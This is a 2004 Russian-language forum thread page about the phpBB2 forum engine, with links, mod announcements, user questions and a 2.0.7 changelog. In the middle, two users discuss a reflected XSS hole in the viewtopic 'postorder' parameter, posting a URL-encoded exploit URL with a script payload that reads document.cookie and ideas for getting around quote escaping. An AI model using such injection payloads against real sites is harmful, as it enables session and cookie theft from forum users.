NT Advanced Member Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору Мы переехали в новый топик! Сюда!     В этой теме обсуждаем форумный движок phpBB » Полезные Линки:    » http://www.phpBB.com  - официальный сайт      » http://forumimages.com - сайт с графикой для phpBB2    » http://sourceforge.net/...  -  phpBB 2.0.8a    » http://www.phpBB.com/phpBB/  - обсуждение и поддержка (english)    » http://www.phpbbhacks.com  - всевозможные хаки      » http://www.phpbbhacks.com/templates.php  - шаблоны для phpBB      » http://www.phpbbhacks.com/templatesdemo    » http://www.phpbb2-users.de/ - довольно хороший сайт про phpBB    » http://myphpbb.com.ru/ - Неплохой сайт про phpBB, много хаков.    » http://forum.ru-board.com/...фильтр по форуму "Другие форумы" по теме phpBB    » http://www.hacksphpbb.ru  - Еще один российский сайт модов (хаков)     » Полезные Хаки:    » Advanced Quick Reply Hack (Быстрый ответ) [ чинить баг ]    » Last Post Topic on Index (Название топика с последним ответом на главной странице)    » Forum Icons (Разные иконки форумов)    » Double post merge (Склеивание постов)    » Translit BBCode (Заменяет транслит на кириллицу методами php)    » eDonkey Link replacer (Добавляет любой текст в звериные линки на форуме)    » "Хак" для Advanced Quick Reply Hack (Добавляет имя цитируемого юзера)    » Хак: Замечания к постам (Текст модератора под постом)    » Хак: Бан в куки (информация о том что ты был забанен пишется еще и в cookies)   »  Ответы на вопросы:    » Не работают куки (cookies)    » Как в phpBB вставить баннеры и все такое прочее?    » Форум заменяет русский текст на "лабуду" типа "тест"    » Advanced Quick Reply добавляет лишнюю строку при цитировании    » Как отредактировать условия регистрации?    » Как убрать надпись о том что если вам меньше 13ти лет...? Всего записей: 1861 | Зарегистр. 27-07-2002 | Отправлено: 00:17 04-09-2002 | Исправлено: xntx, 23:46 28-10-2004

4Life Advanced Member Редактировать | Профиль | Сообщение | ICQ | Цитировать | Сообщить модератору Возможно ли изменять бєкгроунд текста в сообщении? ---------- ▓▓▓Made in Ukraine▓▓▓ Всего записей: 766 | Зарегистр. 05-06-2003 | Отправлено: 20:54 07-03-2004

alexhemp упал с пальмы Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору xntx Приводя JavaScript код, я имел ввиду, что далее его нужно представлять в виде URLENCODED как в примере на securitylab Всего записей: 1945 | Зарегистр. 13-12-2001 | Отправлено: 00:45 09-03-2004

xntx хнотик-багоискатель Редактировать | Профиль | Сообщение | ICQ | Цитировать | Сообщить модератору alexhemp всмысле урлэнкодить 2 раза? потому что если один раз, то сам мотор php его превратит в обычные символы следуя стандартам php ---------- Hello world! Всего записей: 5169 | Зарегистр. 15-02-2003 | Отправлено: 01:16 09-03-2004

xntx хнотик-багоискатель Редактировать | Профиль | Сообщение | ICQ | Цитировать | Сообщить модератору hamshen имхо, в этом году его можно не ждать... ---------- Hello world! Всего записей: 5169 | Зарегистр. 15-02-2003 | Отправлено: 23:13 09-03-2004

alexhemp упал с пальмы Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору xntx Не знаю, не знаю Код:   Exploit: URL: http://site/phpBB/viewtopic.php?t=123456&postorder=%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65 %72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C   note unescape('=%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6 F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C') == '"><script>alert(document.cookie)</script><'     Там как раз первый символ - кавычки, и они отлично вставляются. Или я не вьехал? Я просто не стал делать escape а изложил свое представление как эту дырку можно использовать куском псевдо-кода. Всего записей: 1945 | Зарегистр. 13-12-2001 | Отправлено: 23:59 09-03-2004

hamshen Advanced Member Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору xntx а в следующем? ---------- Хорошие умирают молодыми, но плохие умирают уродливо. Всего записей: 614 | Зарегистр. 22-04-2002 | Отправлено: 17:11 10-03-2004

xntx хнотик-багоискатель Редактировать | Профиль | Сообщение | ICQ | Цитировать | Сообщить модератору alexhemp у меня этот код дает... Цитата: \"><script>alert(document.cookie)</script> тоесть кавычка слешится, а значит нах он не нужен...   hamshen создается сопутсвующий вопрос, а зачем? чем тебе сейчашешнего мало? ---------- Hello world! Всего записей: 5169 | Зарегистр. 15-02-2003 | Отправлено: 22:20 10-03-2004

alexhemp упал с пальмы Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору xntx Вообще-то кавычки экранируют слешами в PHP, а в JavaScript это не так. Опять-же тренироваться нужно на форуме с дыркой ;-)   У меня на тестовом форуме эта иньекция дает   Код:   <a class="maintitle" href="viewtopic.php?t=20&amp;start=0&amp;postdays=0&amp;postorder=\"><script>alert(document.cookie)</script><&amp;highlight=&amp;sid=4224fc1d273db0b99adc246082d5a7ae">     Жиным я выделил успешную "инекцию" JavaScript кода. Кавычка как видно отслешена, но это всего-лишь дает параметр "postorder=/" в выводе страницы.   В общем я так и не понял, причем здесь экранирование кавычки, если в HTML коде это самое экранирование не работает в принципе.   Добавлено Если ты имеешь ввиду, что строку вставить в кусок JavaScript не выйдет, то я думаю, что можно будет обойтись без кавычек соорудив конструкицю типа   chr(xx)+chr(yy)+chr(zz) Будет длинно конечно, но обойтись без кавычек можно. Всего записей: 1945 | Зарегистр. 13-12-2001 | Отправлено: 00:55 11-03-2004

xntx хнотик-багоискатель Редактировать | Профиль | Сообщение | ICQ | Цитировать | Сообщить модератору hamshen изменяй дальше...   alexhemp Цитата: Если ты имеешь ввиду, что строку вставить в кусок JavaScript не выйдет, то я думаю, что можно будет обойтись без кавычек соорудив конструкицю типа   chr(xx)+chr(yy)+chr(zz)   Будет длинно конечно, но обойтись без кавычек можно. a, ну да, ты прав... я как то не подумал что там int нужен а не str ---------- Hello world! Всего записей: 5169 | Зарегистр. 15-02-2003 | Отправлено: 22:17 11-03-2004

xntx хнотик-багоискатель Редактировать | Профиль | Сообщение | ICQ | Цитировать | Сообщить модератору hamshen Цитата: setcookie ( string name [, string value [, int expire [, string path [, string domain [, int secure]]]]] ) значит удалить куку (дословно: сделать чтоб истекла прямо сейчас) ---------- Hello world! Всего записей: 5169 | Зарегистр. 15-02-2003 | Отправлено: 00:14 15-03-2004

Jovani Member Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору Кто не в курсе: Вышла phpBB 2.0.7   Изменения относительно 2.0.6: Fixed several vulnerabilities in modcp - Robert Lavierck   Changed whois lookup address within admin index   Fixed potential vulnerability in viewtopic postorder - 2.0.6d   Updates to cope with Zend Optimizer 2.5 problems - 2.0.6d - jetset   Force specialcharing of redirect variable in login - Pit   Fixed potential vulnerability in viewtopic postdays - GulfTech Security Research   Fixed potential vulnerability in viewforum topicdays - GulfTech Security Research   Fixed potential vulnerability in modcp   Fixed potential vulnerability in avatar gallery Всего записей: 205 | Зарегистр. 23-07-2001 | Отправлено: 06:31 16-03-2004

3xp0 Moderator Редактировать | Профиль | Сообщение | ICQ | Цитировать | Сообщить модератору Собственно я кучу хаков пересмотрел. Искал портал-хак. Их много - согласен. Но мне нужен такой портал хак, чтобы в нем на главной странице, где публикуются новости, можно было писать длинные новости и вставлять картинки, графику и вообще что угодно. К сожалению все портали, которые я нашел обрезают новости и так далее. Кто-нить видел подобное, что я ище? Заранее спасибо. Всего записей: 6398 | Зарегистр. 22-09-2002 | Отправлено: 09:52 30-03-2004

Jovani Member Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору Svarga Похоже кто-то конкретно "взялся" за phpbb   Дырку уже залатали: http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=185180 Всего записей: 205 | Зарегистр. 23-07-2001 | Отправлено: 23:37 30-03-2004

Mercuree Junior Member Редактировать | Профиль | Сообщение | ICQ | Цитировать | Сообщить модератору обновлён Double post merge (Склеивание постов) до 1.0.1   комментарии как всегда приветствуются. Всего записей: 138 | Зарегистр. 16-11-2002 | Отправлено: 02:13 31-03-2004

Страницы: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100

Компьютерный форум Ru.Board » IkonBoard и другие форумы » Другие форумы » Все о phpBB2

Antuan (29-10-2004 02:01):

Переход по форумам  Закладки   » Компьютеры Цифровое изображение Программы Microsoft Windows UNIX Другие OS Hardware В помощь сисадмину Прикладное программирование Игры Форумные игры   » Интернет Web-программирование В помощь вебмастеру Графика Хостинг Зацените-ка!   » Тематические Ikonboard v.2 Ikonboard v.3 Invision Board Другие форумы PHP-Nuke и другие порталы Мобила   » Общие Спорт Флейм Темы по региональным встречам Музыка и Кино Юмор Литература и Живопись   » Ru.Board Новости Помощь по форуму   » Андеграунд eBookz Варезник Раздачи и акции Мобильный варезник Андеграунд Игры и фильмы   » Специальные Тестирование